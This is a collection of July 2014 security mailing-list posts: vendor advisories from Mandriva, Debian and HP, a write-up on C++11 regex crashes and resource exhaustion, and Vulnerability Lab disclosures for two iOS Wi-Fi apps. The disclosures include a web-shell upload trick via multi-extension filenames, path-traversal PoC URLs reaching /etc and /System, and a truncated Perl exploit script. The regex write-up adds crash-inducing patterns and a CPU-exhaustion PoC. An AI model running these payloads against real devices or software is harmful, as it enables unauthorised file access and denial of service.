[ MDVSA-2014:145 ] php-ZendFramework
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2014:145 http://www.mandriva.com/en/support/security/ ___ Package : php-ZendFramework Date: July 31, 2014 Affected: Business Server 1.0 ___ Problem Description: A vulnerability has been found and corrected in php-ZendFramework: The implementation of the ORDER BY SQL statement in Zend_Db_Select of Zend Framework 1 contains a potential SQL injection when the query string passed contains parentheses (CVE-2014-4914). The updated packages have been upgraded to the latest ZendFramework (1.12.7) version which is not vulnerable to this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4914 http://framework.zend.com/security/advisory/ZF2014-04 ___ Updated Packages: Mandriva Business Server 1/X86_64: f9e5804a58b8af73a972bfa0a2da6284 mbs1/x86_64/php-ZendFramework-1.12.7-1.mbs1.noarch.rpm 1a5d10af134d2b517d3752a8119b2339 mbs1/x86_64/php-ZendFramework-Cache-Backend-Apc-1.12.7-1.mbs1.noarch.rpm 1d37c1497156c59d7539333b2b413e8b mbs1/x86_64/php-ZendFramework-Cache-Backend-Memcached-1.12.7-1.mbs1.noarch.rpm 99414b75a630264f9dcfe4c8dfa53e6e mbs1/x86_64/php-ZendFramework-Captcha-1.12.7-1.mbs1.noarch.rpm 9ac1fb5c76b9f0b71abf1bf90a273ebd mbs1/x86_64/php-ZendFramework-demos-1.12.7-1.mbs1.noarch.rpm d25f8e0658bbe3ce7f026d20baeebadf mbs1/x86_64/php-ZendFramework-Dojo-1.12.7-1.mbs1.noarch.rpm 75218f17b04edc9c422aa8117239411d mbs1/x86_64/php-ZendFramework-extras-1.12.7-1.mbs1.noarch.rpm 9ca8a5d6aa73e77f2e679e5020be0d41 mbs1/x86_64/php-ZendFramework-Feed-1.12.7-1.mbs1.noarch.rpm 46c3592a516b33b3f30fa6603d9085b7 mbs1/x86_64/php-ZendFramework-Gdata-1.12.7-1.mbs1.noarch.rpm aecf3e6879dca04b9084660c5f490626 mbs1/x86_64/php-ZendFramework-Pdf-1.12.7-1.mbs1.noarch.rpm 44829853ef1ac199da93b5affaec8070 mbs1/x86_64/php-ZendFramework-Search-Lucene-1.12.7-1.mbs1.noarch.rpm 2338a7798d2ce6f72666a1fcedfe9b72 mbs1/x86_64/php-ZendFramework-Services-1.12.7-1.mbs1.noarch.rpm 914762e556834e2ce9e17d6d10ad81a0 mbs1/x86_64/php-ZendFramework-tests-1.12.7-1.mbs1.noarch.rpm a8bd5d5bc7c4c8579278e22650a4d3be mbs1/SRPMS/php-ZendFramework-1.12.7-1.mbs1.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/en/support/security/advisories/ If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.12 (GNU/Linux) iD8DBQFT2esDmqjQ0CJFipgRAuIqAKDiZkSxIOcYE5rqlzO9pcoZdzQe5QCdF8EM FqiUcm9b3m34mIxKJh1+ePU= =aLqo -END PGP SIGNATURE-
[ MDVSA-2014:146 ] file
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2014:146 http://www.mandriva.com/en/support/security/ ___ Package : file Date: July 31, 2014 Affected: Business Server 1.0 ___ Problem Description: A vulnerability has been found and corrected in file: file before 5.19 does not properly restrict the amount of data read during a regex search, which allows remote attackers to cause a denial of service (CPU consumption) via a crafted file that triggers backtracking during processing of an awk rule. NOTE: this vulnerability exists because of an incomplete fix for CVE-2013-7345 (CVE-2014-3538). The updated packages have been patched to correct this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3538 http://www.ubuntu.com/usn/usn-2278-1/ ___ Updated Packages: Mandriva Business Server 1/X86_64: 0636c4e876032a3ff1002c5d63de21d9 mbs1/x86_64/file-5.12-1.4.mbs1.x86_64.rpm ff23b901c9785895ba3f28fff7bf0de3 mbs1/x86_64/lib64magic1-5.12-1.4.mbs1.x86_64.rpm 42fd86544666d9dfaaacf024a10f7b8d mbs1/x86_64/lib64magic-devel-5.12-1.4.mbs1.x86_64.rpm 49a659053ba64b6c876327ea4502fd48 mbs1/x86_64/lib64magic-static-devel-5.12-1.4.mbs1.x86_64.rpm 800f518cb307bc382b7ca75482e41371 mbs1/x86_64/python-magic-5.12-1.4.mbs1.noarch.rpm 88247988206ea8316ff26621797b249f mbs1/SRPMS/file-5.12-1.4.mbs1.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/en/support/security/advisories/ If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.12 (GNU/Linux) iD8DBQFT2ex7mqjQ0CJFipgRAqh2AKDVuGs69Zc1uJwDrV8C58nJrAtMKwCg7pzM ioZYyztBjD25vFlGNwpLAXo= =5tOC -END PGP SIGNATURE-
[SECURITY] [DSA 2993-1] tor security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian Security Advisory DSA-2993-1 secur...@debian.org http://www.debian.org/security/ Peter Palfrader July 31, 2014 http://www.debian.org/security/faq - - Package: tor CVE ID : CVE-2014-5117 Several issues have been discovered in Tor, a connection-based low-latency anonymous communication system, resulting in information leaks. o Relay-early cells could be used by colluding relays on the network to tag user circuits and so deploy traffic confirmation attacks [CVE-2014-5117]. The updated version emits a warning and drops the circuit upon receiving inbound relay-early cells, preventing this specific kind of attack. Please consult the following advisory for more details about this issue: https://blog.torproject.org/blog/tor-security-advisory-relay-early-traffic-confirmation-attack o A bug in the bounds-checking in the 32-bit curve25519-donna implementation could cause incorrect results on 32-bit implementations when certain malformed inputs were used along with a small class of private ntor keys. This flaw does not currently appear to allow an attacker to learn private keys or impersonate a Tor server, but it could provide a means to distinguish 32-bit Tor implementations from 64-bit Tor implementations. The following additional security-related improvements have been implemented: o As a client, the new version will effectively stop using CREATE_FAST cells. While this adds computational load on the network, this approach can improve security on connections where Tor's circuit handshake is stronger than the available TLS connection security levels. o Prepare clients to use fewer entry guards by honoring the consensus parameters. The following article provides some background: https://blog.torproject.org/blog/improving-tors-anonymity-changing-guard-parameters For the stable distribution (wheezy), these problems have been fixed in version 0.2.4.23-1~deb7u1. For the testing distribution (jessie) and the unstable distribution (sid), these problems have been fixed in version 0.2.4.23-1. For the experimental distribution, these problems have been fixed in version 0.2.5.6-alpha-1. We recommend that you upgrade your tor packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1 iQIcBAEBCgAGBQJT2ht+AAoJEAVMuPMTQ89EtFgP/3AWMfTTOxdZn046F/QemXPl zuDTBhfllKc2s0UXOV63/yjfqr0oa703a/EhWIwZttc9NTi03NY9iKEwNeB+HUCN b3hENNISFdVp5i11pmbExSTGhfmgBLMPXXJAKbj5Zz1wsUr4SKJpsI0caaBXOOYp mTOHy0iKvT8RnpBiR0v2pXcCAQEqPy/7j99npO8SDwlOIcG7bmePc+L6YsHT99gh shNxnnjQIqO45rVHkqVCJc7uEx5k3i3rq0nDQnTrbiZI4G2zOJi7XfteJlCzl0vc XUt/7cTQeKyIRnNhRE09BctSs+bygCOJXY94iBoOc3eTxGeMoLcORRGZ8R1Jae99 cj8cfT3rH/SP1uWON071I9awwhXaC0nwHtkejAiA6S51rZBaUnQqCFEHp/D3ku7V NZ8Iux1JYkuXFYyU/FgFouRpbyt3ApITgKFjCySZmH0Kcm7C78gUuHyXhgvQfhdw MG9DvNIMlRKNAOXlBA9ZUSNpz1YzHRrv0KpwPnlaKSMwvuuuzhfXqFUzbEFLjbkL pPx0goe/BAmdRDKD0to4JhnpzRh71HtZwIOwJWQpqQ/p2IN0s7C5hrfk+g+Bh5kl fQBUnE18ZJC9ytQlUkYUd0Isc6HfmSQn3C2KA8pDV5jXn4tCMe9u2kfsB10uAPiY K/PnpW3fw41iiJPdYDZI =+/Vb -END PGP SIGNATURE-
TigerCom iFolder+ v1.2 iOS - Multiple Vulnerabilities
Document Title: === TigerCom iFolder+ v1.2 iOS - Multiple Vulnerabilities References (Source): http://www.vulnerability-lab.com/get_content.php?id=1284 Release Date: = 2014-07-30 Vulnerability Laboratory ID (VL-ID): 1284 Common Vulnerability Scoring System: 7.4 Product Service Introduction: === iFolder+, Belong to yourself is a mobile application coded by TigerCom. The application allows to communicate and share information or files in the wifi network. The app is uncommercial and can be downloaded through the apple itunes shop or app-store. - Safty - Intelligent encryption, protect the folder - No Internet connection to prevent the documents stolen - Password protected, locked the document - Wireless transmission - Using Wifi, you can share files between iphone, ipad and computer - Current open folder sharing, better protect your privacy - Private photos/videos/documents - Import photos and videos from album - Export photos and videos to your album - Open camera, store photos and recording video - Photos and videos preview - Photos and video high fidelity storage - Photo browsing, support for gestures to zoom - video playing, perfect playback experience - Support PDF, TXT documents directly browsing - Photo folder, Video folder, Documents folder, easily classified - Support Wifi Import and Export - Private accounts/contacts - Account protection, add a variety of accounts ( Copy of the Homepage: https://itunes.apple.com/de/app/ifolder+/id622423906 ) Abstract Advisory Information: == The Vulnerability Laboratory Research Team discovered multiple vulnerabilities in the official TigerCom iFolder+ v1.2 iOS mobile application. Vulnerability Disclosure Timeline: == 2014-07-30: Public Disclosure (Vulnerability Laboratory) Discovery Status: = Published Affected Product(s): TigerCom Product: iFolder+ - iOS Mobile Web Application 1.2 Exploitation Technique: === Remote Severity Level: === High Technical Details Description: 1.1 A local file include web vulnerability has been discovered in the official TigerCom iFolder+ v1.2 iOS mobile web-application. The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system specific path commands to compromise the mobile web-application. The web vulnerability is located in the `filename` value of the `uploadfile` module. Remote attackers are able to inject own files with malicious `filename` values in the `uploadfile` POST method request to compromise the mobile web-application. The local file/path include execution occcurs in the index `folder list` context next to the vulnerable filename value. The attacker is able to inject the local file request by usage of the available `wifi interface` for file or folder exchange/share. Remote attackers are also able to exploit the filename validation issue in combination with persistent injected script codes to execute different local malicious attacks requests. The attack vector is on the application-side of the wifi service and the request method to inject is POST. The security risk of the local file include web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 7.3. Exploitation of the local file include web vulnerability requires no privileged web-application user account or user interaction. Successful exploitation of the local file include web vulnerability results in mobile application or connected device component compromise. Request Method(s): [+] [POST] Vulnerable Service(s): [+] iFolder+ v1.2 Vulnerable Module(s): [+] uploadfile Vulnerable Parameter(s): [+] filename Affected Module(s): [+] Index Folder Dir Listing (http://localhost:8080/) 1.2 An arbitrary file upload web vulnerability has been discovered in the official TigerCom iFolder+ v1.2 iOS mobile web-application. The arbitrary file upload issue allows remote attackers to upload files with multiple extensions to bypass the web-server or system validation. The vulnerability is located in the `uploadfile` module. Remote attackers are able to upload a php or js web-shells by renaming the file with multiple extensions to bypass the file restriction mechanism. The attacker uploads for example a web-shell with the following name and extension `image.jpg.gif.js.php.jpg`. After the upload the attacker needs to open the file in the web application. He deletes the .jpg . gif file extension and can access the application file with elevated
[SECURITY] [DSA 2994-1] nss security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Debian Security Advisory DSA-2994-1 secur...@debian.org http://www.debian.org/security/ Raphael Geissert July 31, 2014 http://www.debian.org/security/faq - - Package: nss CVE ID : CVE-2013-1741 CVE-2013-5606 CVE-2014-1491 CVE-2014-1492 Several vulnerabilities have been discovered in nss, the Mozilla Network Security Service library: CVE-2013-1741 Runaway memset in certificate parsing on 64-bit computers leading to a crash by attempting to write 4Gb of nulls. CVE-2013-5606 Certificate validation with the verifylog mode did not return validation errors, but instead expected applications to determine the status by looking at the log. CVE-2014-1491 Ticket handling protection mechanisms bypass due to the lack of restriction of public values in Diffie-Hellman key exchanges. CVE-2014-1492 Incorrect IDNA domain name matching for wildcard certificates could allow specially-crafted invalid certificates to be considered as valid. For the stable distribution (wheezy), these problems have been fixed in version 2:3.14.5-1+deb7u1. For the testing distribution (jessie), and the unstable distribution (sid), these problems have been fixed in version 2:3.16-1. We recommend that you upgrade your nss packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v2.0.22 (GNU/Linux) iEYEARECAAYFAlPaLcQACgkQYy49rUbZzlryAwCfcT/wdXfIg3Qan7v49hkErZtP XU4AoIuaVrosMXowQjtqvD8LJqNZ9hd+ =rne3 -END PGP SIGNATURE-
[ MDVSA-2014:147 ] sendmail
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2014:147 http://www.mandriva.com/en/support/security/ ___ Package : sendmail Date: July 31, 2014 Affected: Business Server 1.0 ___ Problem Description: Updated sendmail packages fix security vulnerability: Sendmail before 8.14.9 does not properly closing file descriptors before executing programs. This bug could enable local users to interfere with an open SMTP connection if they can execute their own program for mail delivery (e.g., via procmail or the prog mailer) (CVE-2014-3956). ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3956 http://advisories.mageia.org/MGASA-2014-0270.html ___ Updated Packages: Mandriva Business Server 1/X86_64: 9f87330fbfb62d7ae3b22b0cada29c52 mbs1/x86_64/sendmail-8.14.6-2.1.mbs1.x86_64.rpm 7c54405a5aad8b5d269f826dcedf3815 mbs1/x86_64/sendmail-cf-8.14.6-2.1.mbs1.x86_64.rpm 82b6adad99a9e24e8d1ce9be4169c02c mbs1/x86_64/sendmail-devel-8.14.6-2.1.mbs1.x86_64.rpm 7351c18b5763064dd79d4e750e1b0a83 mbs1/x86_64/sendmail-doc-8.14.6-2.1.mbs1.x86_64.rpm ae7f0df3cc9fac2f0586184bf5eaf382 mbs1/SRPMS/sendmail-8.14.6-2.1.mbs1.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/en/support/security/advisories/ If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.12 (GNU/Linux) iD8DBQFT2gz3mqjQ0CJFipgRAuZDAJ9arMIYKjF9sD2MNz051quy/gx7YACgxVAt BpmuxuyJoiM1vWndD1+k5zY= =T6gv -END PGP SIGNATURE-
[ MDVSA-2014:148 ] dbus
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2014:148 http://www.mandriva.com/en/support/security/ ___ Package : dbus Date: July 31, 2014 Affected: Business Server 1.0 ___ Problem Description: Updated dbus packages fix security vulnerabilities: A flaw was reported in D-Bus#039;s file descriptor passing feature. A local attacker could use this flaw to cause a service or application to disconnect from the bus, typically resulting in that service or application exiting (CVE-2014-3532). A flaw was reported in D-Bus#039;s file descriptor passing feature. A local attacker could use this flaw to cause an invalid file descriptor to be forwarded to a service or application, causing it to disconnect from the bus, typically resulting in that service or application exiting (CVE-2014-3533). ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3532 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3533 http://advisories.mageia.org/MGASA-2014-0294.html ___ Updated Packages: Mandriva Business Server 1/X86_64: 3ec7d0230c9bba5579b6970e80e30b1d mbs1/x86_64/dbus-1.4.16-6.4.mbs1.x86_64.rpm 0086d90124d84e60a09c70fa8e70baf3 mbs1/x86_64/dbus-doc-1.4.16-6.4.mbs1.x86_64.rpm d126249502ee1a3819af4e5ae9600115 mbs1/x86_64/dbus-x11-1.4.16-6.4.mbs1.x86_64.rpm 17d4362c3888962ac3e402eacc5aac15 mbs1/x86_64/lib64dbus-1_3-1.4.16-6.4.mbs1.x86_64.rpm 8e46f1e7c2c5d4fb2ffc4fda7bfba55b mbs1/x86_64/lib64dbus-1-devel-1.4.16-6.4.mbs1.x86_64.rpm df3ab9438c830215ad2b3597921d0333 mbs1/SRPMS/dbus-1.4.16-6.4.mbs1.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/en/support/security/advisories/ If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.12 (GNU/Linux) iD8DBQFT2g5hmqjQ0CJFipgRAqnvAJ9dYBe41rRJS6wgul/J+MM9FucTcQCgwqnZ ZAJiQeK2X5Igq8mHwz7YuwQ= =TEte -END PGP SIGNATURE-
[security bulletin] HPSBMU03081 rev.1 - HP Enterprise Maps, Remote Information Disclosure
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c04390793 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c04390793 Version: 1 HPSBMU03081 rev.1 - HP Enterprise Maps, Remote Information Disclosure NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2014-07-31 Last Updated: 2014-07-31 Potential Security Impact: Remote disclosure of information Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY A potential security vulnerability has been identified with HP Enterprise Maps. The vulnerability could be exploited remotely to allow disclosure of information. References: CVE-2014-2628, SSRT101627 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP Enterprise Maps v.1 BACKGROUND CVSS 2.0 Base Metrics === Reference Base Vector Base Score CVE-2014-2628(AV:N/AC:L/Au:S/C:C/I:C/A:C)9 === Information on CVSS is documented in HP Customer Notice: HPSN-2008-002 RESOLUTION HP has provided a patch for HP Enterprise Maps v.1 to resolve the vulnerability. Please contact HP support to request the patch. HISTORY Version:1 (rev.1) - 31 July 2014 Initial release Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-al...@hp.com. Report: To report a potential security vulnerability with any HP supported product, send Email to: security-al...@hp.com Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/ Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB. 3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX Copyright 2014 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided as is without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.13 (GNU/Linux) iEYEARECAAYFAlPasC0ACgkQ4B86/C0qfVmwUgCg2UrkZP26BEuU4SEd/Fo+qDPz CuIAn3r8C4EOIpsIgJGsdb1H+wvd3lNp =LNnF -END PGP SIGNATURE-
C++11 regex insecure by default
C++11 regex insecure by default
http://cxsecurity.com/issue/WLB-2014070187
--- 0 Description ---
In this article I will present a conclusion of testing the new 'objective
regex' in several implementation of standard c++ library like libcxx (clang)
and stdlibc++ (gcc). The results show the weakness in official supported
implementations. Huge complexity and memory exhaustion were well known in most
of libc libraries. Theoretical the new c++11 regex eliminate resource
exhaustion by specifying special limits preventing for evil patterns.
In glibc there was the conviction that for the safety of use regcomp() respond
vendor using regex implementation. However, it is difficult to do the parser of
regular expression in clients applications and others remote affected. The
exceptions support for regex errors looks very promising. Let's see some part
of documentation std::regex_error
-std::regex_constants::error_type---
error_space
there was not enough memory to convert the expression into a finite state
machine
error_complexity
the complexity of an attempted match exceeded a predefined level
error_stack
there was not enough memory to perform a match
-std::regex_constants::error_type---
error_complexity looks promising but which the value of level complexity is the
best'? There is many interpretations between usability and security. In
security aspect this level should be low for to keep real time execution. In
contrast to the static code analysis where execution time is not so important.
The other constants like error_space and error_stack are also interesting in
security view.
After official release for stdlibc++ regex in GCC 4.9.0 I have decided check
this implementation. To prove that these limits do not fulfill their role, I
reported below issues
GCC:
libstdc++ C++11 regex resource exhaustion
https://gcc.gnu.org/bugzilla/show_bug.cgi?id=61601
libstdc++ C++11 regex memory corruption
https://gcc.gnu.org/bugzilla/show_bug.cgi?id=61582
CLANG:
libcxx C++11 regex cpu resource exhaustion
http://llvm.org/bugs/show_bug.cgi?id=20291
In my observation libc++ wins in performance. Only problem with error
complexity reported. In ticket #20291 we are searching answer for default
pre-set level value. However for each use can be personal. GCC has fixed most
dangerous issues before releasing official version 4.9.0 where regex is
supported. Anyway stack overflow still occurs in last regex implementation.
--- 0.1 GCC before 4.9 Memory corruption ---
# ./c11RE '(|'
Segmentation fault (core dumped)
--- 0.2 GCC 4.9 Memory corruption ---
(gdb) r '((.*)()?*{100})'
Starting program: /home/cx/REstd11/kozak5/./c11re '((.*)()?*{100})'
Program received signal SIGSEGV, Segmentation fault.
0x00402f15 in std::_Bit_reference::operator bool() const
--- 0.3 GCC Trunk Stack Overflow ---
Starting program: /home/cx/REtrunk/kozak5/t3 '(.*{100}{300})'
Program received signal SIGSEGV, Segmentation fault.
0x0040c22a in std::__detail::_Executorchar const*,
std::allocatorstd::sub_matchchar const* , std::regex_traitschar,
true::_M_dfs(std::__detail::_Executorchar const*,
std::allocatorstd::sub_matchchar const* , std::regex_traitschar,
true::_Match_mode, long) ()
--- 0.4 CLANG CPU Exhaustion PoC ---
#include iostream
#include regex
#include string
using namespace std;
int main() {
try {
regex r((.*(.*){9}),
regex_constants::extended);
smatch results;
string test_str =
|||;
if (regex_search(test_str, results, r))
cout results.str() endl;
else
cout no match;
} catch (regex_error e) {
cout extended: what: e.what() ; code: e.code()
endl;
}
return 0;
}
--- CLANG CPU Exhaustion ---
--- 1 Conclusion ---
I think It's dangerous situation what may have a bearing on the quality similar
to the glibc regex.h. Maybe only a new type of extended regular expressions
provide safety? It's good moment to start discussion about of safety regex in
new c++.
--- 2 References ---
libstdc++ C++11 regex resource exhaustion
https://gcc.gnu.org/bugzilla/show_bug.cgi?id=61601
libstdc++ C++11 regex memory corruption
https://gcc.gnu.org/bugzilla/show_bug.cgi?id=61582
libcxx C++11 regex cpu resource exhaustion
http://llvm.org/bugs/show_bug.cgi?id=20291
GCC 4.9 Release Series New Features
https://gcc.gnu.org/gcc-4.9/changes.html
--- 3 Thanks ---
gcc and clang support and KacperR
--- 4 About ---
Author:
Maksymilian Arciemowicz
Contact:
http://cxsecurity.com/wlb/add/
Photo WiFi Transfer 1.01 - Directory Traversal Vulnerability
Document Title: === Photo WiFi Transfer 1.01 - Directory Traversal Vulnerability References (Source): http://www.vulnerability-lab.com/get_content.php?id=1285 Release Date: = 2014-07-31 Vulnerability Laboratory ID (VL-ID): 1286 Common Vulnerability Scoring System: 6.7 Product Service Introduction: === Using this app, you can download photos to a PC or a smartphone from your iPhone through WiFi. The app provides the easiest and fastest way to do it. Just run the app on the iPhone and open the web browser on your PC or another smart phone. That is all that you are required to do. It is quite simple. In addition to the web browser, a ftp client application is also supported to access the photos. Do not pay money for these functions as the app provides all of them without charging. (Copy of the Homepage: https://itunes.apple.com/us/app/photo-wifi-transfer/id892772036 ) Abstract Advisory Information: == The Vulnerability Laboratory Research Team discovered a directory traversal vulnerability in the official BlueFinger Photo WiFi Transfer v1.01 iOS mobile application. Vulnerability Disclosure Timeline: == 2014-07-31: Public Disclosure (Vulnerability Laboratory) Discovery Status: = Published Affected Product(s): BlueFinger Apps Product: Photo WiFi Transfer - iOS Mobile Web Application (FTP) 1.01 Exploitation Technique: === Remote Severity Level: === High Technical Details Description: A directory traversal web vulnerability has been discovered in the official BlueFinger Photo WiFi Transfer v1.01 iOS mobile application. The vulnerability allows remote attackers to bypass the path restriction of a service to access sensitive app-, web-server or -device information. The vulnerability is located in the `ftp` (ftp://localhost:8080) service of the wifi `web-server` module. The issue allows an attacker to bypass the regular `folder/path` validation mechnism to access sensitive app web-server or iOS -device information. The attack vector of the issue is on the application-side of the service and to perform malicious request the `GET method` is required to use. After the start of the web-server by usage of the ftp function, the attacker is able to include 5 more path values (../../../../../) to access unauthorized higher folders outside the mobile application service. In the analysis we saw that the path change of 5 directories is required to bypass. During the tests we accessed the full app service folder and through the directory traversal to web-server configuration files but also the parent device directory. The security risk of the directory traversal web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.7. Exploitation of the path traversal web vulnerability requires no privileged web-application user account or user interaction. Successful exploitation of the directory traversal vulnerability results in mobile application or connected device component compromise. Request Method(s): [+] GET Vulnerable Module(s): [+] Directory Vulnerable Parameter(s): [+] path Affected Module(s): [+] Parent Directory (ftp://localhost:8080/) Proof of Concept (PoC): === The directory traversal web vulnerability can be exploited by attackers without privileged application user account and user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. Exception: 50 /private/var/mobile/Applications/CFCEEF6E-AA35-42D6-84EC-BFB518F764B1/Documents/photo/../../etc/passwd No such file or directory. Standard Request: ftp://localhost:8080/../../Documents/ PoC: Links ftp://localhost:8080/../../../../../../../../../../../../../../../../etc ftp://localhost:8080/../../../../../../../../../../../../../../../../usr/ ftp://localhost:8080/../../../../../../../../../../../../../../../../Applications/ ftp://localhost:8080/../../../../../../../../../../../../../../../../System/ Exploit: PoC (PL) #!/usr/bin/perl use LWP::Simple; print ---\n; print -= Photo WiFi Transfer v1.0.1 - PoC Directory Traversal=-\n; print ---\n\n; print Target(ftp://localhost:8080/)\ ; chomp($targ = STDIN); print Path: (/fn25/)\; chomp($path=STDIN); $url = ../../../../../../../../etc/; $page = get(http://.$targ.$path.$url) || die [-] Unable to retrieve: $!; print [+] Connected to: $page\n; Exploit: PoC (HTML) html headbodytitle/title iframe
